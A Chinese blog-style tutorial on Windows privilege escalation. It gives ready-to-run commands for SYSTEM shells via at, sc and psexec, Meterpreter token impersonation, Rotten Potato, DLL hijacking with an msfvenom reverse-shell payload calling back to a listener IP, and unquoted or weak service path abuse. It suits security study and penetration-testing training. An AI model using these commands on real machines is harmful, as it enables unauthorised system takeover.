首页 > 系统相关 >【待做】【攻防技术系列+权限提升】Windows提权

【待做】【攻防技术系列+权限提升】Windows提权

时间:2024-07-27 19:28:55浏览次数:12  
标签:攻防 令牌 服务 命令 Windows 提权 权限

Windows提权思维导图

Windows提权工具
vulmap

vulmon开发的一款开源工具,原理是根据软件的名称和版本号来确定,是否有CVE及公开的EXP。这款Linux的工具挺好用,但是对于Windows系统层面不太适用。
windows-exp-suggester

这款和本工具的原理一样,尝试使用了之后,发现它的CVEKB数据库只更新到2017年的,并且没有给出CVE是否有公开的EXP信息。
WindowsVulnScan

这是一款基于主机的漏洞扫描工具,采用多线程确保可以快速的请求数据,采用线程锁可以在向sqlite数据库中写入数据避免的错误,采用哈希算法确保数据不重复插入。

搜集CVE与KB的对应关系。首先在微软官网上收集CVE与KB对应的关系,然后存储进数据库中

查找特定CVE网上是否有公开的EXP

利用powershell脚本收集主机的一些系统版本与KB信息

利用系统版本与KB信息搜寻主机上具有存在公开EXP的CVE 

AT&SC&PS提权

AT命令提权

at 命令提权的原理:at命令是一个计划命令,可以在规定时间完成一些操作,这个命令调用的是system权限。

适用版本:Win2000 & Win2003 & XP中还是存在的,在Win7以后被剔除,当我们拿到一个低权限的用户,通过3389端口远程连接上后,可以通过at命令来进行本地提权

AT提权命令:

at 15:13 /interactive cmd.exe(在15:13分生成一个交互式的System权限的cmd)


SC命令提权

命令介绍:SC 是用于与服务控制管理器和服务进行通信的命令行程序。提供的功能类似于“控制面板”中“管理工具”项中的“服务”。

适用版本:windows 7、8、03、08、12、16

提权命令:

sc Create syscmd binPath= "cmd /K start" type= own type= interact

其中systcmd是服务名称,大家可以随意填写,binpath是启动的命令,type=own是指服务这个服务属于谁,type=interact。

这里再解释一下 cmd/k start 这个命令,这个命令就是启动一个新的cmd窗口。
所以命令的意思是创建一个叫syscmd的新交互式的cmd服务,然后执行sc start syscmd 启动服务就得到了一个system权限的cmd环境。

PS命令提权

微软官方工具包:

https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools

PS介绍:PsExec属于SysInternalSuite (一个windows的内核的套件)是其中一个工具,可以利用它进行提权。

适用版本:Win2003 & Win2008

PS提权命令:

psexec.exe -accepteula -s -i -d cmd.exe

令牌窃取提权

令牌窃取提升--本地提权介绍:

进行远程过程调用时请求提升权限,然后调用它从而生成特权安全令牌以执行特权操作。
当系统允许令牌不仅用于进程本身,还用于原始请求进程时,漏洞就会出现。

执行过程:

获取会话——利用模块——窃取令牌——提权

适用版本:

Microsoft Windows XP Professional SP3 和之前版本

Windows Server 2003 SP2 和之前的版本

Windows Server 2003 x64 和 x64 SP2

Windows Server 2003(用于基于 Itanium 的系统 SP2 和先前版本)

Windows Server 2008 x32 x64 Windows Server 2008(用于基于 Itanium 的系统)

Windows Vista SP1 和之前的版本 Windows Vista x64 SP1 和之前的版本

令牌窃取提权命令:

use incognito

list_tokens -u

impersonate_token "NT AUTHORITY\SYSTEM" (机器名\\用户名) 

烂土豆配合令牌窃取提权

烂土豆提权原理:

欺骗“NT AUTHORITY\SYSTEM”账户通过NTLM认证到控制的TCP终端

对这个认证过程使用中间人攻击(NTLM重放),为“NT AUTHORITY\SYSTEM”账户本地协商一个安全令牌。这个过程通过一系列的Windows API调用实现的。

模仿这个令牌。只有具有“模仿安全令牌权限”的账户才能去模仿别人的令牌。一般大多数服务型账户(IIS、MSSQL等)都有这个权限,用户级账户大多数没有这个权限。

一般从Web拿到的WebShell 都是IIS 服务器权限,是具有这个模仿权限,使用菜刀反弹meterpreter就会成功

烂土豆&&热土豆

烂土豆比热土豆的优点:

100%可靠

全版本通杀

立即生效,不用像hot potato 那样有时候需要等到Windows更新才能使用

通过中间人攻击,将COM(NT\SYSTEM权限)在第二步挑战应答过程中认证的区块改成自己的区块获取SYSTEM令牌,然后利用msf的模仿令牌功能模仿SYSTEM令牌

非服务类用户权限无法窃取成功(原理) 过程:上传烂土豆-执行烂土豆-利用窃取模块-窃取 SYSTEM-成功

上传后依次执行以下命令:

use incognito

执行potato.exe命令:list_tokens -u execute -cH -f ./potato.exe

list_tokens -u impersonate_token "NT AUTHORITY\SYSTEM"
进程注入提权

进程注入提权介绍:

进程注入提权是本地提权方式的一种较为老的安全技术了,利用的是注入进程的所有者实现权限共享机制,这类技术主要利用在 windows2008 之前操作系统上。

进程注入提权工具:

pinjector进程注入工具——win2008 以前操作系统

pexec64 32进程注入工具——win2008 及后操作系统
DLL 劫持提权

原理:Windows 程序启动的时候需要 DLL。如果这些 DLL 不存在,则可以通过在应用程序要查找的 位置放置恶意 DLL 来提权。通常,Windows 应用程序有其预定义好的搜索 DLL 的路径,它会根据下 面的顺序进行搜索:

应用程序加载的目录

C:\Windows\System32

C:\Windows\System

C:\Windows

当前工作目录 Current Working Directory,CWD

在 PATH 环境变量的目录(先系统后用户)

过程:信息收集-进程调试-制作 dll 并上传-替换 dll-启动应用后成功

命令如:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.22 lport=6677 -f dll >shell.dll

dll劫持提权需要特定软件应用的控制权限及启用配合,复杂鸡肋

有第三方软件、有替换权限、管理员要运行这个软件
不带引号服务路径

不带引号服务路径配合 MSF-Web,本地权限

原理:当 Windows 服务运行时,会发生以下两种情况之一。如果给出了可执行文件,并且引用了完整路径,则系统会按字面解释它并执行。但是,如果服务的二进制路径未包含在引号中,则操作系统将会执行找到的空格分隔的服务路径的第一个实例。 过程:检测引号服务路径-利用路径制作文件并上传-启用服务或重启-调用后成功

检测引号服务路径安全命令:wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\" |findstr /i /v """

启动服务命令:sc start "服务名"
不安全的服务权限

不安全的服务权限配合 MSF-本地权限 原理:即使正确引用了服务路径,也可能存在其他漏洞。由于管理配置错误,用户可能对服务拥有 过多的权限,例如,可以直接修改它导致重定向执行文件。

过程:检测服务权限配置-制作文件并上传-更改服务路径指向-调用后成功

accesschk下载:https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk

检测服务权限配置:accesschk.exe -uwcqv "administrators" *

更改服务路径指向:sc config "NewServiceName" binpath="C:\Program.exe"

重启服务调用:sc start "NewServiceName"

图片

本文版权归作者和微信公众号平台共有,重在学习交流,不以任何盈利为目的,欢迎转载。

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。公众号内容中部分攻防技巧等只允许在目标授权的情况下进行使用,大部分文章来自各大安全社区,个人博客,如有侵权请立即联系公众号进行删除。若不同意以上警告信息请立即退出浏览!!!

敲敲小黑板:《刑法》第二百八十五条 【非法侵入计算机信息系统罪;非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。

标签:攻防,令牌,服务,命令,Windows,提权,权限
From: https://www.cnblogs.com/o-O-oO/p/18305129

相关文章

  • 【待做】【攻防技术系列+网络协议】ARP协议
    ARP简介ARP协议是“AddressResolutionProtocol”(地址解析协议)的缩写。在局域网中,网络中实际传输的是“帧”,帧里面是有目标主机的MAC地址的。在以太网中,一个主机要和另一个主机进行直接通信,必须要知道目标主机的MAC地址。但这个目标MAC地址是如何获得的呢?它就是通过地址解析协......
  • Windows系统更新R版本及Rstudio
    由于一些包对R的版本的要求比较高,所以有时候我们不得不更新R的版本。但是呢,更新了R版本后,另外有些包的版本又不兼容,唉,更新R包的版本又很费时,所以一般能不更新就不更新吧。下面介绍一下常见的更新R的方法吧。一、更新R版本(1)在RGui或Rstudio中使用以下代码(推荐RGui) #install......
  • 【模型训练-1】【Windows-PaddleOCR-ocr模型训练(CPU)】数据标注
    模型训练使用ocr的使用对硬件设备有比较高的依赖。网上下的模型没有GPU的加持识别效率不高,完成自有模型的训练在相同硬件设备的基准上能大大提高识别效率,加速脚本执行效率。看一组数据:训练了自己的模型识别耗时1000ms,相同的图片网上随便下的模型4000ms接下来可以根据......
  • windows redis5使用,下载安装
    1.Reids下载Redis对windows支持停留在3版本,在github看到有大佬适配的5版本可用地址:https://github.com/tporadowski/redis/releases访问不了的可在此链接下载:https://download.csdn.net/download/qq_51355375/895851952.Redis使用2.1cmd启动redis-server.exe......
  • bzt 运行期间 Windows 11 上的 Chrome 驱动程序安装路径差异
    我在bzt运行期间遇到Chromedriver安装问题。下载zip文件后,系统似乎在以下路径中查找它:15:23:03ERROR:FileNotFoundError:[WinError3]系统找不到指定的路径:'系统找不到指定的路径:'C:\Users\sunimali\.bzt\selenium-taurus\tools\drivers\chromedriver\127.0.......
  • Python 需要 Windows 长路径
    我尝试运行此安装:pip3installmsgraph-sdk它给了我这个错误:它说我需要使用此链接启用Windows长路径:https://learn.microsoft.com/en-us/windows/win32/fileio/maximum-file-path-limitation?tabs=registry#enable-long-paths-in-windows-10-versi......
  • 【WSL2】在Windows通过自定义域名访问wsl2中的服务
    前言目前在windows与windows的wsl系统之间,宿主机无法通过相对较固定的方式来进行网络访问,通常需要使用wsl的ip来访问,而ip可能不是很直观并且可能会有变更,当前教程解决了这个问题,通过hosts映射的方式实现windows宿主机访问wsl服务。脚本的原理:在linux启动时,执行一次修改windows......
  • Windows11重置后出现Windows.old文件夹无法删除,报错C:\Windows.old\WINDOWS\System
    问题:Windows11重置后出现Windows.old文件夹无法删除,报错C:\Windows.old\WINDOWS\System32\WDI-目录不是空的。网上的各种方法均不奏效:https://baike.baidu.com/item/windows.old/2431751?fr=ge_ala最终的解决方法:发现在WDI文件夹下是空的,于是在这个文件夹下面建立了......
  • Windows窗口函数常规
    1、wWinMain(HINSTANCEhInstance,HINSTANCEhPrevInstance,LPWSTRlpCmdLine,intnCmdShow)宽字符版本主函数hInstance(HINSTANCE):这是一个句柄,指向当前应用程序的实例。当程序启动时,系统会为该应用程序创建一个实例,并且这个句柄会被用来标识它。此句柄可以......
  • 如何在 Windows 10 中重置忘记的密码而不丢失数据
    面对电脑开机密码忘记的尴尬情况,许多用户可能会感到手足无措,尤其是对于那些依赖电脑进行日常工作和学习的人来说,这无疑是一个急需解决的难题。幸运的是,根据不同的操作系统(如Windows、macOS等),存在几种相对安全且有效的方法来重置或绕过开机密码,从而恢复对电脑的访问权限。以下,......